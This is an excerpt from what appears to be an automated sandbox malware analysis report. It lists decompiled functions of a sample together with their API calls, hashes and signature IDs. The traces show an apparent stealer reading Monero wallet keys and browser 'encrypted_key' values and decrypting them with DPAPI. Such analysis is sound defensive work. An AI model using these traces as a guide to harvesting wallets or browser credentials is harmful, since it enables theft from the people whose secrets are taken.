                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E28,00000000,?), ref: 00D4882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48836
                              • wsprintfA.USER32 ref: 00D48850
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                              • Instruction ID: e8cf9485563fdad084531af7c4ff7d2d2a78c92a01c05bbcdaf648583639d9ee
                              • Opcode Fuzzy Hash: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                              • Instruction Fuzzy Hash: 832130B1A40208AFDB04DF94DD45FAEBBB8FB48701F144159F619A7280C77999419BA2
                              Function 00D48D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                              • wsprintfW.USER32 ref: 00D48D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                              • Instruction ID: d981db67a730bed3978b01c4211eb8670daf2b39eeacac714cca1011a62adf2c
                              • Opcode Fuzzy Hash: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                              • Instruction Fuzzy Hash: 43E0ECB5A4020CBFDB14DB94DD0AE6D7BBCEB84702F044194FD0D97280DA719E54ABA7
                              Function 00D3A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00D3A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00D3A6BC
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                              • Instruction ID: eae38fd510842dabaa083300f8d31e3322ad164dc73cfb37da3c4618db5c3a9d
                              • Opcode Fuzzy Hash: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                              • Instruction Fuzzy Hash: 85E1ED72850118ABEB15FBA8DC92EEE7338EF54304F518169F516B6091EF306A4DCB72
                              Function 00D3D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D481
                              • lstrlen.KERNEL32(00000000), ref: 00D3D698
                              • lstrlen.KERNEL32(00000000), ref: 00D3D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                              • Instruction ID: af098c426f7b9fdf2dee618d6c252d65c12d67ffb54557ee3396bca1aa2c27f1
                              • Opcode Fuzzy Hash: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                              • Instruction Fuzzy Hash: 83912072850118ABEB04FBA8DC92EEE7339EF54304F514569F507B6092EF346A49CB72
                              Function 00D3D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D801
                              • lstrlen.KERNEL32(00000000), ref: 00D3D99F
                              • lstrlen.KERNEL32(00000000), ref: 00D3D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                              • Instruction ID: dc1ade036a89be8e7d23605ca322a674c967e57ca19bad55de2e35bbb6da6f98
                              • Opcode Fuzzy Hash: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                              • Instruction Fuzzy Hash: 80812D728501189BEB04FBA8DC92EEE7339EF54304F514529F407B6092EF346A49CBB2
                              Function 00D43560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 1c271c47c5aa2efe056ecdb1acb9bf87108b78aa54f4339ceeb82498b9403cb0
                              • Instruction ID: fd2ac6ea8b4900622e03f071c8d3d5949b349896e7955537b2bab5a980cf4e03
                              • Opcode Fuzzy Hash: 1c271c47c5aa2efe056ecdb1acb9bf87108b78aa54f4339ceeb82498b9403cb0
                              • Instruction Fuzzy Hash: 6C412E71D14209AFDF04EFA8D845AEEB774EF54304F148018F81676291DB75AA49CFB2
                              Function 00D39CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                                • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                                • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                                • Part of subcall function 00D39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                                • Part of subcall function 00D39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                                • Part of subcall function 00D39B60: LocalFree.KERNEL32(?), ref: 00D39BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: f11f06779eece05c3cf3101826bb8d39d06734bddfcc062b5896b0a4c00112ca
                              • Instruction ID: 04d133b2008f0feb1de8ef08336e5fc1e691d773cbadb19cb3259f0d567c855c
                              • Opcode Fuzzy Hash: f11f06779eece05c3cf3101826bb8d39d06734bddfcc062b5896b0a4c00112ca
                              • Instruction Fuzzy Hash: 37312FB6D10209ABCF14DFE4DC96AEFB7B8EF48304F184519E905A7241EB749A05CBB1
                              Function 00D492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00D43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43AEE,?), ref: 00D492FC
                              • GetFileSizeEx.KERNEL32(000000FF,00D43AEE), ref: 00D49319
                              • CloseHandle.KERNEL32(000000FF), ref: 00D49327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                              • Instruction ID: ae9a10ebb245fde290d2ef09c79049fe71e8557ca2d78d5ae76a12bad3d8acf8
                              • Opcode Fuzzy Hash: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                              • Instruction Fuzzy Hash: C3F0A934E00208BBDB14DFB1DC19F9EB7B9AB88320F11C254BA55A72C0D670AA419B51
                              Function 00D4C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00D4C74E
                                • Part of subcall function 00D4BF9F: __amsg_exit.LIBCMT ref: 00D4BFAF
                              • __getptd.LIBCMT ref: 00D4C765
                              • __amsg_exit.LIBCMT ref: 00D4C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                              • Instruction ID: 29935a6414632201ced1ed2a2306b2e1e77edaa955fd15cc666faa069bb0ad2e
                              • Opcode Fuzzy Hash: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                              • Instruction Fuzzy Hash: 51F0B4329527109BDB70BBBC5807B5D33A0EF10732F24514AF844A62D2DB6499449E76
                              Function 00D44F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44F7A
                              • lstrcat.KERNEL32(?,00D51070), ref: 00D44F97
                              • lstrcat.KERNEL32(?,008D89F0), ref: 00D44FAB
                              • lstrcat.KERNEL32(?,00D51074), ref: 00D44FBD
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                                • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
